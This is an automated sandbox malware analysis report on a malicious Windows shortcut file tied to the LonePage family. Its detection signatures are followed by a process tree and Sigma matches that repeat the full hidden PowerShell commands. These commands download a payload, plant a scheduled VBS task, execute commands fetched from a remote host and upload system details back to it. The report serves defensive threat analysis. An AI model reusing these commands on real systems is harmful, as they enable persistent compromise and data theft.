Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Xkci1BfrmX.lnk

Overview

General Information

Sample name:Xkci1BfrmX.lnk
renamed because original name is a hash value
Original sample name:757fcc23a03ad93e5414ae62b910ec171286123a903472bc9bfe102ec9d30d78.lnk
Analysis ID:1522684
MD5:183474e2bc35660701e24edecea07c71
SHA1:2d59c3f6b34ccc25d8706e40c1b2001a445df01b
SHA256:757fcc23a03ad93e5414ae62b910ec171286123a903472bc9bfe102ec9d30d78
Tags:lnkUAC-0099user-JAMESWT_MHT
Infos:

Detection

LonePage
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download payload from hardcoded c2 list
Windows shortcut file (LNK) starts blacklisted processes
Yara detected LonePage
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Machine Learning detection for sample
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 6928 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7JGJqZG89d2hvYW1pOyRiamRvKz0nPT0nOyRiamRvKz1bU3lzdGVtLk5ldC5EbnNdOjpHZXRIb3N0QWRkcmVzc2VzKCRpcCkrW1N5c3RlbS5FbnZpcm9ubWVudF06Ok5ld0xpbmU7JGhibj1JRVggJGprcjskYmpkbys9JGhibnxPdXQtc3RyaW5nO1tieXRlW11dJGRycHk9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6VXRmOC5HZXRCeXRlcygkYmpkbyk7fTtzdGFydC1zbGVlcCAxMDskdWprPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDtzdGFydC1zbGVlcCAxNjskdWprLnVwbG9hZGRhdGEoJ2h0dHBzOi8vb25lZHJpdmV2aWV3LnNob3AvYXBpL3ZhbHVlcy9yZWZyZXNoODEnLCRkcnB5KTt9IgpyLlJ1biBjLCAwLCBmYWxzZQ==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f; MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Acrobat.exe (PID: 1700 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\appdata\local\temp\sklyar.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
      • AcroCEF.exe (PID: 6180 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • AcroCEF.exe (PID: 7408 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2232 --field-trial-handle=1508,i,8450144638513138785,4609180756953587241,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
    • schtasks.exe (PID: 2472 cmdline: "C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • wscript.exe (PID: 6908 cmdline: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 4476 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);} MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7236 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • wscript.exe (PID: 2116 cmdline: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 4600 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);} MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\Public\Libraries\Libraries.vbsJoeSecurity_LonePageYara detected LonePageJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000004.00000002.1912194930.00000212ADC85000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LonePageYara detected LonePageJoe Security
      00000005.00000002.2771031189.000002536A6B3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LonePageYara detected LonePageJoe Security
        00000004.00000002.1912015299.00000212AD926000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LonePageYara detected LonePageJoe Security
          00000011.00000002.3468994470.000002B4BA7C5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LonePageYara detected LonePageJoe Security
            00000005.00000002.2765832433.00000253685AC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LonePageYara detected LonePageJoe Security
              Click to see the 23 entries

              Other

              SourceRuleDescriptionAuthorStrings
              amsi64_6928.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0x10c:$b1: ::WriteAllBytes(
              • 0xe5:$b2: ::FromBase64String(
              • 0x643:$b2: ::FromBase64String(
              • 0xbf6f:$s1: -join
              • 0x571b:$s4: +=
              • 0x57dd:$s4: +=
              • 0x9a04:$s4: +=
              • 0xbb21:$s4: +=
              • 0xbe0b:$s4: +=
              • 0xbf51:$s4: +=
              • 0xd6ea:$s4: +=
              • 0xd76a:$s4: +=
              • 0xd830:$s4: +=
              • 0xd8b0:$s4: +=
              • 0xda86:$s4: +=
              • 0xdb0a:$s4: +=
              • 0xe288:$e4: Get-WmiObject
              • 0xe477:$e4: Get-Process
              • 0xe4cf:$e4: Start-Process

              Sigma Signatures

              Spreading

              barindex
              Sigma detected: Powershell download payload from hardcoded c2 list
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}, CommandLine|base64offset|contains: ^rbzh'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6908, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]

              System Summary

              barindex
              Sigma detected: Base64 Encoded PowerShell Command Detected
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7JGJqZG89d2hvYW1pOyRiamRvKz0nPT0nOyRiamRvKz1bU3lzdGVtLk5ldC5EbnNdOjpHZXRIb3N0QWRkcmVzc2VzKCRpcCkrW1N5c3RlbS5FbnZpcm9ubWVudF06Ok5ld0xpbmU7JGhibj1JRVggJGprcjskYmpkbys9JGhibnxPdXQtc3RyaW5nO1tieXRlW11dJGRycHk9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6VXRmOC5HZXRCeXRlcygkYmpkbyk7fTtzdGFydC1zbGVlcCAxMDskdWprPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDtzdGFydC1zbGVlcCAxNjskdWprLnVwbG9hZGRhdGEoJ2h0dHBzOi8vb25lZHJpdmV2aWV3LnNob3AvYXBpL3ZhbHVlcy9yZWZyZXNoODEnLCRkcnB5KTt9IgpyLlJ1biBjLCAwLCBmYWxzZQ==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7J
              Sigma detected: Potentially Suspicious PowerShell Child Processes
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f, CommandLine: "C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7JGJqZG89d2hvYW1pOyRiamRvKz0nPT0nOyRiamRvKz1bU3lzdGVtLk5ldC5EbnNdOjpHZXRIb3N0QWRkcmVzc2VzKCRpcCkrW1N5c3RlbS5FbnZpcm9ubWVudF06Ok5ld0xpbmU7JGhibj1JRVggJGprcjskYmpkbys9JGhibnxPdXQtc3RyaW5nO1tieXRlW11dJGRycHk9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6VXRmOC5HZXRCeXRlcygkYmpkbyk7fTtzdGFydC1zbGVlcCAxMDskdWprPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDtzdGFydC1zbGVlcCAxNjskdWprLnVwbG9hZGRhdGEoJ2h0dHBzOi8vb25lZHJpdmV2aWV3LnNob3AvYXBpL3ZhbHVlcy9yZWZyZXNoODEnLCRkcnB5KTt9IgpyLlJ1biBjLCAwLCBmYWxzZQ==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f;, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6928, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f, ProcessId: 2472, ProcessName: schtasks.exe
              Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7JGJqZG89d2hvYW1pOyRiamRvKz0nPT0nOyRiamRvKz1bU3lzdGVtLk5ldC5EbnNdOjpHZXRIb3N0QWRkcmVzc2VzKCRpcCkrW1N5c3RlbS5FbnZpcm9ubWVudF06Ok5ld0xpbmU7JGhibj1JRVggJGprcjskYmpkbys9JGhibnxPdXQtc3RyaW5nO1tieXRlW11dJGRycHk9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6VXRmOC5HZXRCeXRlcygkYmpkbyk7fTtzdGFydC1zbGVlcCAxMDskdWprPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDtzdGFydC1zbGVlcCAxNjskdWprLnVwbG9hZGRhdGEoJ2h0dHBzOi8vb25lZHJpdmV2aWV3LnNob3AvYXBpL3ZhbHVlcy9yZWZyZXNoODEnLCRkcnB5KTt9IgpyLlJ1biBjLCAwLCBmYWxzZQ==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7J
              Sigma detected: Script Interpreter Execution From Suspicious Folder
